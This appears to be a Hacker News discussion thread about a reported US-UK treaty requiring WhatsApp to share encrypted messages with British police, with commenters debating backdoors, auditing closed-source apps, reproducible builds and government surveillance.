We believe people have a fundamental right to have private conversations. End-to-end encryption protects that right for over a billion people every day.
We will always oppose government attempts to build backdoors because they would weaken the security of everyone who uses WhatsApp including governments themselves. In times like these we must stand up both for the security and the privacy of our users everywhere. We will continue do so.
Will, Head of WhatsApp
My understanding is that they can prevent you from removing warrant canaries but they can't force you to continue announcing "I have not received a secret warrant".
In places where there are limits to what the government can do to an with you, its possible to resist.
The US government can’t legally compel you to lie, but may restrict what you can say.
We know that the legal bar for forcing someone to speak or not speak is high (compelling state interest), but national security has usually been held to pass such a bar.
Warrant canaries are nice to have, but viewing them as something which provides proof of absence of government meddling is incorrect.
That wouldn’t even be illegal, since they never hit you with a wrench - you just imagined they were about to go xkcd on you
It reads like your product is already compatible with govt ease dropping
You don't have to take our word on this -- I wouldn't want you to. As others on this thread have pointed out it's possible enough to tear through our binaries that if we did have a backdoor it would be discovered.
No, it's not "possible enough" and I strongly suspect you fully realize that.
A backdoor doesn't need to be in a form of an IF statement or something comparably obvious and silly. It can be a weakly seeded PRNG that would allow a "determined party" to brute-force the key exchange in a reasonable time. That would take man-years to fish out from a binary, and that's without considering that you may (be forced to) distribute an altered binary on demand and to specific targets only.
So in the end all we have - realistically - is in fact just your word. There's no way for you to prove that you are trustworthy by pointing at some random binary. The only option is to distribute reproducible builds from an audited open source.
Simple example: I'm sure that whatsapp main window is webview. Imagine that application inserts some kind of resource (e.g. CSS) from whatsapp server. So now whatsapp server can serve slightly altered CSS which will leak secret data via custom fonts, etc and you won't be able to find that, unless you're intercepting all traffic and can decrypt it (and apps nowadays love to pin certificates).
This is imaginary attack, I have no idea whether whatsapp does that. But HTML is a powerful and dangerous beast, yet it's used a lot in applications for rich media.
Signal has the same issue.
Active ways to attack the client to make it leak the key are far more worrying - but even an open source project wouldn't protect against that.
Good luck finding even this without a fine comb. And that's us just getting started with code flow obfuscation.
No source = no trust. It's as simple as that.
Of course if WhatsApp detected an abnormal or tampered version of the app, they can suspend or disable your account. I'm sure security labs that do reverse engineering of this sort probably do it on test handsets with burner numbers and identities so it wouldn't affect any personal accounts they use.
That said, @wcathcart: in community with deep technical expertise like Hacker News, folks do consider how many possible channels and means there are to confidentially leak information from applications.
You're correct that in the general case it's likely that tech-savvy users would scan a popular app like yours and find any 'obviously-placed' backdoors. It's an observational and opportunistic approach, akin to the way a passer-by might spot a poorly locked bicycle on a street.
Unfortunately there's an extra level of complexity here - any app may have unusual behaviors that a sophisticated attacker could trigger for individual users to exploit them - and it's really, really hard for the security-conscious of us -- who might never see or meet those users -- to truly trust that your app is doing what you tell us it is, whether that's end-to-end encryption in all situations, or anything else.
The reason is that without being able to see how the app is written, verify that it's genuinely the same compiled version running on all devices, and audit the behavior it will have under exceptional circumstances -- external observers just don't know.
I'm not expecting you to make the source freely available, incredible though that would be - but attempting to explain the potential disconnect in dialogue you might find with some commentors.
That's explicitly against your terms of service.
Sometimes this leads to us being blocked. We were blocked in Brazil, for example, but that block was overturned in the courts.
It'd indeed be interesting to know if the FSB had some kind of baseband vulnerability that they'd used willy-nilly to facilitate dragnet surveillance.
I suspect William Binney was right though - blanket surveillance is just expensive and hides your needles in a mountain of hay; you really want high quality in the data you store in order to ease extraction of meaningful information / intelligence.
(that's not to say that aggregate meta data isn't interesting - just that with actual content noise is a problem)
Have you considered architectural changes that will allow for the app to be compiled and deployed by an affiliate corp outside of these jurisdictions?
So will WhatsApp refuse to comply, if this goes forward?
And is that even possible?
I do appreciate that Facebook has the resources to fight. To fight an NSL, even. But IANAL, and have no clue.
Any comment on this?
Platforms that rely on trust (in this case, trusting that FB isn't doing bad things) provide very weak guarantees about privacy/security. They could easily include a keylogger in WhatsApp and bypass the e2e encryption, for example, and us regular folk have no way of knowing.
Careful - you're right that WhatsApp is untrustworthy, but laws that force them to add backdoors could well be applied to open-source code as well. Or make possession of non-backdoored software, open or not, illegal. Or compel OS/hardware manufacturers on which the code runs. The law is a dangerous thing to ignore.
Implementing hardware backdoors that are opaque to end users is theoretically possible, but more difficult in practice. You could, for example, build a screen/monitor that just captures everything on the screen and forwards it to some other entity, but in practice it's not so easy because of bandwidth limitations, etc. I suppose it would be much easier to create a physical keyboard that phones home over a mobile network, although it would only give you half the conversation.
*edit: added the word "audited".
Where does that leave the rest of society? Having open source software and hardware is not enough, we also need laws that prohibit mass surveillance and support our efforts to uphold human rights.
Laws are probabilistic, whereas math & source code is deterministic. You can verify that computer code does what it says it does. Laws depend on enforcement and complicated judicial systems (based on humans) to interpret and apply the laws, which means they can effectively change over time, and the goalposts are never stationary.
This is why moving the goalposts and further normalizing surveillance is extremely dangerous. The rights that you enjoy today are not universal, and can obviously be eradicated in less than a generation.
There is no mathematical escape hatch from society. All we have is a messy assortment of technological mitigations that change the cost of surveillance.
These mitigations work best in combination with constitutional rights that limit what the government of the day can do, triggered by the latest outrage in the news.
This is clearly a straw man, no one wants to do this, or is suggesting that we do this. But at some point, even the most hardened OSS advocate has to trust someone (usually the hardware manufacturer). You cannot verify that the device you're on doesn't spy on you, you have to rely on the manufacturer's word that it doesn't. And the manufacturer's suppliers, of course, because the manufacturer is trusting them.
Somewhere along the stack, we all have to draw a line and say "beyond this point, I trust that I am not being spied on". You choose to draw that line at the hardware point. Others choose to draw the line at the software point.
Proper law enforcement (mind the "enforcement" part) can make a neighborhood safe enough so that nobody tries to shoot you and you won't need to wear vests. But in the end of the day, if you are messing with bad people in the bad neighborhood: bulletproof vests are real, laws are not.
And when you are talking about government enforcing the laws that are supposed to forbid uncontrollable government agencies to do what they do: well, government kinda is bad people in the bad neighborhood.
Not necessarily. Have you ever heard of Ken Thompson's backdoored C compiler?
>Re-write compiler code to contain 2 flaws:
>When compiling its own binary, the compiler must compile these flaws
>When compiling some other preselected code (login function) it must compile some arbitrary backdoor
>Thus, the compiler works normally - when it compiles a login script or similar, it can create a security backdoor, and when it compiles newer versions of itself in the future, it retains the previous flaws - and the flaws will only exist in the compiler binary so are extremely difficult to detect.
It's not necessarily a viable attack method today, but it's the lesson behind it that's important. Anything can be compromised.
So you still just invest trust in the maintainer or — if you’re lucky — the third party auditing firm who was paid to review the code.
That you can review the code doesn’t mean that anyone does so. At least not in an exhaustive and relevant way.
Closed source or open, the problem is made even worse now that we live in a Package Manager culture where even the simplest applications adopt dozens of dependencies.
I’m not saying that you should trust Facebook and their closed source applications, just that you’re not really all that safer trusting anyone else just because their source code is available.
Correct use of past tense. In the present, e2e encryption is by default.
> Does this new announcement really lessen the security and privacy of the users?
Yes it does, since e2e encryption is enabled by default now. Best I can tell, there’s no way to disable it either.
You assume that you actually understand the code well enough to identify the backdoor - e.g. as some sort of function that will bypass authentication when some secret hardwired password is provided (to give a dumb example).
However, to give a real world example of backdoored crypto, it is nothing of the sort. For example, the issue with the potentially backdoored Dual_EC_DRBG pseudorandom number generator has been known since 2004 at least - but the algorithm has been standardized by ISO/NIST and used for years until the potential backdoor issue was widely publicized following the Snowden leaks and the standard was withdrawn.
Good luck finding something like that only by reading code unless you are expert in crypto and mathematics. If you were only auditing code whether or not it matches the published, supposedly correct, standard (or algorithm description), you would never find this. The backdoored code was working completely fine, exactly as intended. But the weak random number generator allowed an adversary with sufficient computing resources to break the encryption.
An improvement in security and privacy isn't limited to "make it impossible, even theoretically, for anything bad to ever happen OR you've accomplished nothing". Most back doors aren't inserted by competent NSA-level actors 20 years in advance. Most are "whenever a message passes through, send a copy to this third party". They are inserted by court order for a specific case due to the government becoming interested late in the game due to a specific case. For example, when terrorists start using some secure email service, the government tries to force the service to allow them to snoop on the relevant conversations. Open sourcing the code would allow you (with the help of the community) to detect these sorts of attempts when the product involves end-to-end encryption.
So while having the source and a community auditing changes to that source doesn't prevent every possible attack against your privacy, it prevents almost every one that is plausibly detectable, which is literally as good as you can do.
It's one of the reasons the Debian project has worked so hard at reproducible builds: https://wiki.debian.org/ReproducibleBuilds/About
Bugs can certainly occur (like Heartbleed etc) but the alternative (closed source opaque binary blobs) is much worse.
Now, to avoid the "Reflections On Trusting Trust" exploit, building the C compiler toolchain from known-good "root" compiler/linker toolchains, and then comparing the output vs. self-compilation is quite a bit harder.
Also, I'm still using one of those original builds on my laptop - upgraded of course...still mad love for my daily driver.
And so they never learned, and so they "can't".
In the same way, I can't use Gentoo or vim or compile either or ski or... :D
If you have multiple compilers and they all aren't infected in exactly the same way (e.g. one is not infected, or they have different types of infections) then you can detect there's a problem with them.
JS is an easy target. What about C or C++? You could audit the code but have you also audited your compiler? What if you used Visual Studio?
Code is an easy target. Can you trust the auditors themselves and in the absence of that, your own ability to detect a vulnerability?
The only bulletproof solution is to not use software.
That said, most of us are not as important or recognisable as we believe we are. The layperson won’t have a good reason to isolate their computer and install an airlock between their aluminium-lined office and the rest of their house.
This is just an updated version of the story about the US government scanning your emails for keywords after 9/11. They don’t even need to actually do it, they just need to say they do and most people will monitor their communications.
Many people can compile code from source. Not so many people have the ability to audit code for obscured backdoors. The number of people that are capable to audit and have the time that is necessary to do it is practically nil.
You could also decompile the Whatsapp APK and do the same thing (it's Java after all).
Look no further than the OpenSSL Heartbleed vulnerability
That assumes you can get the code. If it's illegal to distribute non-backdoored software, the code might be hard to get, for example Github might be forced to take it down.
Hacking into closed source code is much more dangerous (politically) for them and also more difficult.
There's currently a push for reproducible builds which further hardens distros against such attacks.
The fly in the ointment is the client might have additional functionality to leak the e2e encryption key. That is far harder to find, but if it's use were widespread, it would be found by researchers.
The whole point is moot though - whatsapp is designed to (by default) upload cleartext chat logs to google/apple servers. Since all chats have 2+ recipients, the conversation is only safe from snooping if nobody in the chat has backup enabled, which is unlikely.
They could indeed serve you a different binary from the app-store. "Do you think that's Whatsapp you're using?"
I have much more trust in the former than the latter.
Audits should start with the actual binary. Only if you can ensure that the binary was build from a specific source code and does not contain any other logic in there (i.e. it was build by a trusted compiler), you can happily skip the decompilation process and analyze that source instead.
It's still nice to see this spelled out since I've seen many people claim that WhatsApp being closed source is not that problematic. This is definitive confirmation that it cannot be trusted anymore and it's time to start working on the problem (both from a legislative point and by seeking out and moving to technological alternatives).
Back in the day, it was illegal to export "good" encryption. There was nothing stopping it from happening technically, just like there is nothing stopping you from stealing from a convince store, except for the threat of enforcement.
But the threat of enforcement can have a strong chilling effect.
I suspect most people want to keep their $500k+/year jobs instead of sticking their necks out. My friends who work at FAANG are largely mentally checked out, and just do it to collect their monies and retire ASAP. You can't pay rent with good feelings.
So just keep making the world shittier. Gotta love individualist capitalism.
Raised the standard of living for billions.
If you define the free market as nothing other than anarchy, then yes the free market is rare indeed.
But I don't that know anyone that speaks in such absolutes.
No one quote in particular; just a recurring theme.
"It is not from the benevolence of the butcher, the brewer, or the baker, that we expect our dinner, but from their regard to their own interest"
- The Wealth of Nations
"The natural effort of every individual to better his own condition...is so powerful, that it is alone, and without any assistance, not only capable of carrying on the society to wealth and prosperity, but of surmounting a hundred impertinent obstructions with which the folly of human laws too often encumbers its operations."
"The statesman who should attempt to direct private people in what manner they ought to employ their capitals, would...assume an authority which could safely be trusted, not only to no single person, but to no council or senate whatever"
"In spite of their natural selfishness and rapacity [capitalists] are led by an invisible hand...and thus without intending it, without knowing it, advance the interest of society"
- The Theory of Moral Sentiments
> Have you read him?
"The man of the most perfect virtue, the man whom we naturally love and revere the most, is he who joins, to the most perfect command of his own original and selfish feelings, the most exquisite sensibility both to the original and sympathetic feelings of others."
Self-interest, yes, but in a system regulated just as much by the church and the aristocracy as by the flow of capital. Pure monetary greed without regard for doing what is right is nothing Smith would ever have advocated.
Imagine if 10 or 20 different organizations all had access to the source code and could vouch for the checskum of a each build.
While it would be nice if we could trust FB, Apple, etc., it would be much better if we didn't have to, and could simply trust others who have less to lose from alienating government officials.
This would be quickly detected by anyone looking at the data the WhatsApp app was sending back to the server (this isn't hard to do on a jailbroken device).
Don't hate the politicians who keep pushing this. They're just trying not to get fired. And the surest way to get fired in a western country right now is to be seen doing nothing about the terrorism problem and then having terrorist acts committed under your watch. So the politician asks the security forces "what can we do to stop terrorism?" Security says "get us access to messages of terrorism suspects". Seems reasonable, let's go ahead with it.
Yes, we know that it doesn't stop with terrorism suspects. Then law enforcement wants to read the messages of drug kingpins, then drug suspects, then shoplifters, then jaywalkers, then everyone, just to be on the safe side.
But as long as people are told that they need to give up some privacy in exchange for security, they'll take the latter every time.
Don’t hate the politician for trying to keep their job. In that respect they’re no different from any other person.
Yes, if you can convince politicians that you’re more concerned about the actual damage to your privacy than the hypothetical increase in the probability of a terrorist attack, then go ahead. Do it. Convince them. But my hunch is that most people are far more terrified of dying in a terrorist attack.
If your conversations aren't encrypted and I have access to them, and people know this, then if I claim that you said a certain something in such a conversation, people are more likely to just believe me.
Also, unencrypted data is data that can be altered by a third party.
I also have nothing to hide :-)
- what are the things you and your significant other are doing in the private of your house?
- which co-worker do fantasize about, be specific in what you like to do.
- As teenager what legal/illegal drugs did you consume. How often did you pass out, who where the people you consumed these drugs with?
- What are your political leanings?
- How much do earn, where are your savings invested in.
- Which illnesses do you currently have, which exist in your social circle.
- what private information was shared with you by other parties. Are you aware of any wrong doings/illegal activity by other people? Be specific esp. friends and family.
Be aware that I will share this information with anyone in your social group/work/volunteering work whenever I feel like it. I may also share this data with extremists groups on the other side of the spectrum, if helpful. Lastly I can use this data to fabricate "helpful" information about you if necessary. Thank you.
Edit: upvoted you. Asking the question, if and when this happened is important for further generations.
That's not your decision to make, as to whether you have something to hide or not. That will be decided by someone else. It's entirely out of your hands and - depending on where and when you are subject to such scrutiny - may be arbitrarily decided, which is in fact a requirement in all authoritarian systems (the law has to be heavily subjective and arbitrarily enforced so it can be directed against anyone at anytime as so required, such that the population is kept in constant fear).
This sounds as if the platforms are already sharing with the US authorities. So this being about them sharing it now with UK authorities.
Similarly the UK has had its spying ruled unlawful under ECHR: https://www.theguardian.com/uk-news/2018/sep/13/gchq-data-co... (perhaps this is why Richard Dearlove, "C" of MI6, is so Brexity)
"Encrypted" could mean that's how they'll be delivered to the UK.
Or it could be a definition of the set of which messages are in question. The set is defined as the ones that users expected were supposed to be protected by encryption (or that government could not access because of encryption).
In other words, from the phrasing alone, it's not clear whether "encrypted" describes the state of the messages or the scope of the sharing.
Whether anyone is actually doing that is another question. And there is no technical reason app stores couldn't send a special backdoor-ed build to select list of users under surveillance if government forced them to. (They can target sets of users for staged roll-outs, beta programs, etc.) Which defeats the notion that one person watching can detect it for everybody.
On the other hand, it's possible to do stuff with smart phones at the platform level. Whether through vulnerabilities or some platform capability (updates, etc.), it may be possible to have a backdoor-ed binary that looks to the user like it is the regular binary. That's not a capability that Signal has, but it is a capability that might very well exist.
Regardless of all that, for users who have auto-updates enabled (most users), even if Signal can't silently push a backdoor-ed update, they can unilaterally push one. You could wake up tomorrow with a different version that has a backdoor, so even if you can identify backdoor-ed binaries, you have to turn off updates or verify the binary every time you open the app.
When you install an app (whether through an app store, or side-loading) the app should state the location online of an append-only log that lists all the releases (with timestamps) for that app. The phone OS could periodically check to see if an upgrade is available, and security researchers could check that the log doesn't contain references to versions which aren't available to the public.
Ideally there should perhaps also be a way for users to anonymously report which version of any app they are using, so that people with particular security concerns could configure their OS to only update an app after, for example, 50% of users have already installed the update.
I agree with that analysis, but it's not clear to me why we don't have similar levels of skepticism about auto-updating desktop apps. Signal in particular uses a third-party software repository, so if it wanted to push a malicious update, it wouldn't even need to sneak it past package maintainers.
Package signing protects you against developers with bad personal security practices, because it makes it harder for a third-party to MITM their apps. But it doesn't do anything I can see to protect you from a developer that turns malicious in the future.
Telegram is subject to US coercion as much as any US company: both major app stores are US-based, and without app store distribution, a product might as well be dead as far as the masses are concerned.
I would, except it requires a mobile phone number.
From the article:
Priti Patel, the U.K.’s home secretary, has previously warned that Facebook’s plan to enable users to send end-to-end encrypted messages would benefit criminals, and called on social media firms to develop “back doors” to give intelligence agencies access to their messaging platforms.
That's the UK's position but it's not clear from the article that some kind of forced backdoor made it into the treaty, just that WhatsApp will be forced to share users’ encrypted messages. But they have already been sharing encrypted messages through other legal means.
More speculation here: https://www.justsecurity.org/24145/u-s-u-k-data-sharing-trea...
Why comment if you didn't read the article? It's in the first paragraph: "Social media platforms based in the U.S. including Facebook and WhatsApp will be forced to share users’ encrypted messages with British police under a new treaty"
(The headline on Bloomberg, "Facebook, WhatsApp Will Have to Share Messages With U.K. Police" is more restrained.)
And worrying that a large number of readers interpretation of the article was influenced by a headline. We really have to do better and be vigilantly aware of how media and power influences public opinion, especially during times such as these.
...that are US-based. You may want to check out Threema for a valid WhatsApp replacement.
>WhatsApp has no ability to see the content of messages or listen to calls on WhatsApp. That’s because the encryption and decryption of messages sent on WhatsApp occurs entirely on your device. Before a message ever leaves your device, it's secured with a cryptographic lock, and only the recipient has the keys.[...]
>A search warrant issued under the procedures described in the Federal Rules of Criminal Procedure or equivalent state warrant procedures upon a showing of probable cause is required to compel the disclosure of the stored contents of any account, which may include "about" information, profile photos, group information and address book, if available. In the ordinary course of providing our service, WhatsApp does not store messages once they are delivered or transaction logs of such delivered messages, and undelivered messages are deleted from our servers after 30 days. WhatsApp offers end-to-end encryption for our services, which is always activated
Very interested to see what their response is and if their promise holds that they do not have technical access to content but merely to account information.
Even if FB / WhatsApp doesn't currently have such a capability, there's no legal guarantee they couldn't be compelled to add it, thereby putting them in conflict with language that didn't include that clause.
Afaik, case law is murky over whether creating new code qualifies as speech (illegal to compel) or facilitating legally-approved wiretapping (legal and required).
More interesting is what happens if someone gets a new phone. In that case (if I understood correctly) they might ask for the sender to resend the messages with a different key. If they really are forced to add a backdoor then that's where I would fit in a MITM attack, as it is limited in scale and detectable when used excessively.
Pretending and using obfuscated language to lead the reader to believe otherwise is disingenuous.
I truely fear for the future that western governments, in particular the 5 eyes members, are hell-bent on creating. They denounce China and Russia for their human rights records in one breath, and seek to strip us of privacy and personal rights in the next - the hypocrisy is simply staggering.
What's perhaps even more frightening is that so many people believe that moves like this are to keep us safe, will keep us safe.
This can not end well...
The 2019 heat was directly implicated in the deaths of at least 15 people. Five died in France, four in Germany, three in the United Kingdom, two in Spain, and one in Italy. Nine of these were drownings, attributed to people cooling down, and another involved an exhausted farm worker who went unconscious after diving into a pool. The three who died in hot air were aged 72, 80 and 93. Approximately 321 million people were otherwise affected by similar temperatures in the same countries.
Edited for clarity
> Netherlands reported 400 excess deaths in the week of the heat wave, a figure comparable to those recorded during the 2006 European heat wave.
Netherlands is considerably smaller than the other nations.. Most put these spikes as a portion* that would have died in the next days weeks, or months lowering statistics later in the year and a portion that would not have.
A paper putting the 2003 heat-wave death toll at 70,000:
*The term from the 2003 paper is harvesting and there were little to no signs of it.
That is not correct whoever wrote it. just do a google search: heatwave 2019 total deaths
CNN reports already 1500 deaths in France only. This is a link to a news site where they estimate a higher count, although I of course cannot verify the correctness of the source: https://www.vox.com/world/2019/6/26/18744518/heat-wave-2019-...
Backdooring a communication is only done to safeguard a government's power under the pretense of security.
Further away from democracy, leaders are purely self serving, successful corruption is seen as a sign of intelligence and whistle-blowers, far from being heroes for pointing out maleficence, are threatened with execution.
And indeed, institutions eventually shift to working solely for the benefit of themselves and the people in charge. Mostly because any that don't are undermined until they do.
I had this thought yesterday as I read about several prominent politicians in Canada, including the prime minister, actively participating in the climate 'protests' that occurred yesterday. Who were they out there protesting? Themselves? They're the ones with the power to change things. Why were they outside with signs instead of in their offices doing something about it?
Those 20 senators (from Alaska, Missouri, Arkansas) are answerable to the demands of their constituents. Those people are not asking for Climate Change Policies. It has nothing to do with money, but the values and culture of the constituents.
It is incredible how HN and majority of the supposedly 'smart' crowd completely fail to understand the dynamics of how policies and laws are passed or made in this country or anywhere else.
It is also incredibly stupid to paint all politicians with the same brush, because if you are an immoral, evil politician you'd exactly want that situation. "All politicians are the same", "All media is the same" is the foundational strategy of bad actors.
Also, so what if the bad actors want us to believe that all politicians are the same? What if it were true that they're all the same and evil? Would it still be "incredibly stupid" to accurately assess the state of affairs?
See for example: https://www.theguardian.com/society/2018/nov/30/excess-winte...
I think it is. The problem is, denying us access to safe communication is not going to make is more safe, but less.
I don't think it is quite as simple as this (I'll preface this with saying I don't think we should have backdoors and that I wish we had STRONG encryption everywhere). I think the problem is that different departments have different goals. It is very clear that the CIA and NSA's jobs would be easier if there was a magical tool that let them backdoor in and no one else. The police and FBI would have an easier time doing their job if encryption wasn't a thing. That's definitely true! The issue is who is watching the watchmen? That's why we need checks and balances (specifically by people that understand the tech). These departments are so focused on their goals that they lose track of the fact that introducing backdoors actually creates more work for them (and thus actually makes their lives harder). But as humans we're always focused more on the task at hand and less on the over arching tasks (we're notoriously bad at dealing with large scale multifaceted problems). It all really comes down to these departments thinking "if we had this tool it would be possible that we could have stopped this" (which possible is the key word, because we've seen that they can't. There's just too much data. You're just adding more hay to the haystack). The failure really is at the checks and balances stage, that those watching the watchmen don't understand the motivations nor the consequences, and thus let them do as they please. Agencies running the checks and balances are supposed to be suspicious and critical, not friendly. But these agencies aren't getting the funding nor can they attract those that are tech literate, so there's a feedback loop that is only getting stronger. What I'm trying to say is that there's this long chain and things are broken at many stages and that if a single stage was fixed there would be significant improvement. Basically solving at any single stage will help stop the feedback loop.
tldr: The intelligence agencies should be smart enough that they would know that backdoors will backfire on them. But they clearly aren't. There's also a huge failure at the checks and balances stage where these agencies are getting approval which creates a feedback loop and without solving this the problem will continue to grow.
There are ZERO people from the pitchfork community who understands the pressure of working in keeping a community, region or country safe. If there is a terrorist attack, the pitchfork people have to answer to ZERO questions, while CIA/NSA/Police will have to answer 'Why didn't you do something".
It is so easy to sit in their comfortable offices and homes and philosophize about privacy when you have no skin in the game.
> It is so easy to sit in their comfortable offices and homes and philosophize about privacy when you have no skin in the game.
And I definitely agree with this. But that's also why I made a big point into that lack of encryption actually gives these agencies more work (if we look at history). The problem is exactly what you note though, there will always be failure and we ask why they can't stop near impossible things to stop. Post hoc analysis is always easier than in situ.
“One who is elected by the common populace to facilitate business at the cost of logical reasoning, human rights and the natural world.”?
While I’m sure one or two exist, I can’t actually think of a politician in the US, UK or Australia who doesn’t fit into the definition somehow. Again, there would be a few good ones, just not enough.
Back in '90s I used a nym e-mail to receive e-mails anonymously and with no traces.
In a few words - e-mails are encrypted with your PGP key and posted to Usenet groups, where you scan all messages and extract only those signed&encrypted with your key.
Yep, there are 1000 and 1 method of communicating securely. Governments are just using this as an excuse to wiretap popular messaging services for general surveillance.
Unless they'll get away with making everyone dumber, they shall fail.
This is not how it works. As long as enough people are not bothered, they will succeed.
I'd love to hear about either a possible alternative government structure in which there are no politicians or a way to attract the smartest people in governments.
When you consider the societal fallout and everything that has transpired since, the most insane part to me is that by its very occurrence, 9/11 itself already prevented the next 9/11. The "next 9/11" was to crash the fourth hijacked plane into a high value traget; the plane on which the passengers fought back which was crashed in Pennsylvania WAS the next 9/11. This was a tactic that was apprehended and adapted to before the day was out. It worked three times on one day, once. An update to the mental calculus of common folks was all it really took. If we had successfully prevented it re-shaping our society, it would have never, ever, ever worked again. This newfound understanding of the rules coupled with a straight-forward countermeasure like reinforced cockpit doors would have closed off that vector of attack entirely.
19 malevolent people acting in 2001 have colored nearly two decades of policy for America. I remember two particular circulating ideas from the time: "they're attacking our way of life" and "they hate us because we are free." The latter was much more divisive and so people spent much more time arguing with each other about it. Meanwhile, whether intentionally on the part of the attackers or not, the first was very effectively accomplished.
Maybe if there had been no 9/11, the agencies charged with protecting Americans would have still been seduced by the ease with which modern technology enables broad surveillance. Maybe hoovering up all the data is too good an opportunity to pass up. Regardless, I yearn for, and still miss the end of history. Our hubris has been rewarded with interesting times.
If a legislator is not technically up to speed, considerable tax payer money goes towards hiring people in government to do the research and the explaining. Some high level advisers may come from organizations with a private agenda and after a few years of working within the goverment these experts pop right back to their industry jobs and we don't hear of them anymore.
Ultimately its the same need in whatever form of government we want – we need people we can trust.
The intention being that politicians are aware that they must be consistent with their words and actions throughout their term otherwise they will lose their seat.
Some months before the last big bail out legislations, in my state we had a US Senate candidate who was new in our political scene, appeared as a local man with a law degree from our state university, and he spoke about how the working people struggled with unemployment, delinquencies etc, as he knew middle class issues and can change the ways of Washington. PBS featured him and I still remember the interview they aired from his kitchen in a middle class home. I am among the people who voted him in.
A few years after this election I checked his voting records by chance and I realized that he had voted almost always in favor of the bailout system. I wouldn’t have known this by just reading the news or watching cable. In the next election cycle he won handily, this time supported by organizations with cash to blanket our news with favorable lines for him. That’s how life works I guess.
Of course he did not win because the other candidate was much better qualified and rural voters knew him en masse (he’s the one that signs checks for all the citizen stewards of oil fields), but I found it hilarious that people would flame me for not voting for a figurehead (president) but be a-ok to vote in some no name hack to manage our schools because of big money advertising in elections
In all seriousness this is the aim of all historical anarchist movements. Despite the propagandization of the term "anarchism", that philosophy has a long history of attempts and writers and thinkers, and it has more often than not "failed" when a powerful state entity violently disbanded the efforts or killed prominent leaders. In other cases anarchism has not failed at all but has existed in tribal communities in different ways long before european thinkers wrote on the subject.
In particular anarcho-communism or the more detailed Communalism of Murray Bookchin (The Next Revolution, 2015 https://www.penguinrandomhouse.com/books/239261/the-next-rev...) looks totally plausible to me.
The biggest issue with state-less society is the conflict with the existing state powers this philosophy creates. However the method of governance has found success in present day Mexico with the Zapatistas:
As well as Rojava in Syria:
So the core problem is that humans don't make great rulers. Not are we good at selecting rulers.
Individuals are the flaw in the system. And a government without stupidity, means a government without humans.
But in that system, how do you allow leniency for the 40 year old single mother of 5 who accidentally switched lanes without using a turn signal?
Individuals also represent humanity in the government. We are not a nation of robots.
https://youtu.be/rgUs5wtXgL4 (the video is a bit dated unfortunately)
Funny story about that, those used to be considered controlled munitions .
As of 2009, non-military cryptography exports from the U.S. are controlled by the Department of Commerce's Bureau of Industry and Security. Some restrictions still exist, even for mass market products, particularly with regard to export to "rogue states" and terrorist organizations.
Militarized encryption equipment, TEMPEST-approved electronics, custom cryptographic software, and even cryptographic consulting services still require an export license.
Furthermore, encryption registration with the BIS is required for the export of "mass market encryption commodities, software and components with encryption exceeding 64 bits" (75 FR 36494). In addition, other items require a one-time review by, or notification to, BIS prior to export to most countries. For instance, the BIS must be notified before open-source cryptographic software is made publicly available on the Internet, though no review is required. Export regulations have been relaxed from pre-1996 standards, but are still complex. Other countries, notably those participating in the Wassenaar Arrangement, have similar restrictions.
We dislike it even though we would be forced to do the same thing in their position. We dislike it because we aren’t the ones in power. Again, as it goes in the jungle, life isn’t always fair.
However, I don't care if it "keeps us safe". It's just wrong in so many ways
The "terrorism" rationalization provided for this surveillance has nothing to do with reality. The United States government is not in any way involved in fighting the source of jihadist terrorism, and the state responsible for 9/11, Saudi Arabia. They are allies, and Trump's cabinet is now attempting to arm Saudi Arabia with nuclear weapons. The actual intent of this law is to surveil whistle-blowers and journalists. WhatsApp messages have already been used in the case against IRS whistle-blower John Fry, who exposed the Donald Trump-Michael Cohen hush payments.
Those apps that provide end-to-end encryption are a problem and they are working on solving it.
Claiming that they should not be able to wiretap lawfully (or even otherwise) is a rather naive view of the world and lawful wiretapping does not imply dystopia.
Are they though? There will always be a means to communicate without surveillance. Backdooring encryption is fundamentally incompatible with privacy, and will be abused - at scale.
For any real cases, the security services have a multitude of other ways of getting the information they need regardless - for example, they could gaining physical access to the target's phone and backdoor/bug it, or swap it out with a backdoored/bugged one.
The real problem with backdooring or outlawing encryption is that it lowers the bar to entry for governments - it makes it too easy, and such sweeping powers will be abused.
That's a very bold claim.
Lawful wiretapping exists because it is accepted (and reasonable) that privacy should stop in specific circumstances, e.g. a criminal investigation.
As I wrote before seeing this in black or white is naive. Wiretapping is useful for society. The key is to have proper oversight.
By the way, to lawfully wiretap a phone the authorities only need the phone number: The operator will then duplicate all traffic transparently and on the fly. Bugging a phone really means illegal/covert operations these days...
When a weakness is introduced into that defense, even if it's a secret key held only by trusted governments and only (they promise) to be used in emergencies, that key is a method of attack that anyone, anywhere can use against everyone. The only defense is that the secret key remain secret, and there are an endless number of ways it could be comprimised, ranging from human error, phishing, or plain old brute forcing. A single key for all Whatsapp conversations is a valuable enough prize for criminals all over the world to invest serious money in custom hardware to crack it.
Currently, encryption schemes like Whatsapp's rely on generation of new keys for every message, making the value of attacking any one message limited. Without this defense, Whatsapp will be cracked, sooner or later. And once someone publicly reveals that key, every single message sent before that point becomes compromised. Maybe even publicly exposed. Would you be okay with that? Exposing your private message history to the internet because governments wanted to snoop?
If there is a key which decrypts everything, then there is a risk it can be stolen or guessed and used to decrypt anyone's messages. This risk does not exist in current, properly designed systems.
Any government which wishes to add a backdoor to an E2E encrypted messaging system must understand that they will be HEAVILY undermining the security and privacy rights for all users of the service which has the backdoor.
Whatsapp decided to go for E2E encryption for commercial and marketing purposes following all those privacy scandals.
They did not have to. They could have gone with P2P encryption, i.e. that their databases could have stored messages in cleartext. That way authorities would not have needed to ask for any backdoor. As already mentioned, this is how cellular operators work (that's obviously something governments wanted).
I think we might see legislation brought in in the future in order to force this.
Okay. Let's just get rid of E2E entirely and let Facebook mine not only our metadata but also the content of our messages. Nice plan.
> let Facebook mine not only our metadata...
Don't use Facebook, then.
Yes, but if you make it too easy, oversight fails or is worked around with legalese, and the powers are abused at scale.
> Bugging a phone really means illegal/covert operations these days
My view here is that it should be difficult - the security services should only be able to intercept someone's communications with a legally obtained warrant to do so (the oversight you mentioned); then powers are far more likely to only be used where the is a credible threat.
Here's a case where the courts say that police surveillance was not correctly authorised: https://www.bailii.org/uk/cases/UKIPTrib/2018/IPT_17_93_H.ht...
I hold the opposite view: that the idea that the evolutionary trajectory of the internet seems wont to continue to allow "wiretapping" (and, for that matter, the existence of a capricious state tout court) is the naive view.
The state is looking increasingly obsolete every day, and moves like this are significant leaps forward in solidifying that conclusion.
The implementation of AES in popular CPUs? Yeah, who knows.
